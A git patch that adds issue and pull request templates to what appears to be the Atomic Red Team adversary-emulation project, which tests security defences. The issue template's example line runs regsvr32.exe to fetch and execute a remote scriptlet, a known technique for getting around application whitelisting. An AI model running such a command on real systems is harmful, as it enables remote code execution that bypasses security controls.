From a7e8f17a3568ce66124cd932d066f819cbc5570a Mon Sep 17 00:00:00 2001 From: Zac Brown Date: Wed, 29 Aug 2018 17:11:27 -0700 Subject: [PATCH] Create issue and pull request templates. Signed-off-by: Zac Brown --- .github/issue_template.md | 26 ++++++++++++++++++++++++++ .github/pull_request_template.md | 8 ++++++++ 2 files changed, 34 insertions(+) create mode 100644 .github/issue_template.md create mode 100644 .github/pull_request_template.md diff --git a/.github/issue_template.md b/.github/issue_template.md new file mode 100644 index 00000000..9cceeebc --- /dev/null +++ b/.github/issue_template.md @@ -0,0 +1,26 @@ +# Report + +## What did you do? + +ℹ Please replace this with what you did. +e.g. Run `regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll` + +## What did you expect to happen? + +ℹ Please replace this with what you expected to happen. +e.g. The atomic test executes and `calc.exe` is launched. + +## What happened instead? + +ℹ Please replace this with of what happened instead. +e.g. 💥 + +## Your Environment + +* Which *specific* operating system are you running (e.g. Windows 7 SP1 32-bit)? +* Did you run the test from an elevated or root prompt? +* If relevant, which atomic test is this specific to? +* If relevant, which [execution harness](2) are you attempting to use? + +[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests" +[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks" \ No newline at end of file diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md new file mode 100644 index 00000000..057f7948 --- /dev/null +++ b/.github/pull_request_template.md @@ -0,0 +1,8 @@ +**Details:** + + +**Testing:** + + +**Associated Issues:** + \ No newline at end of file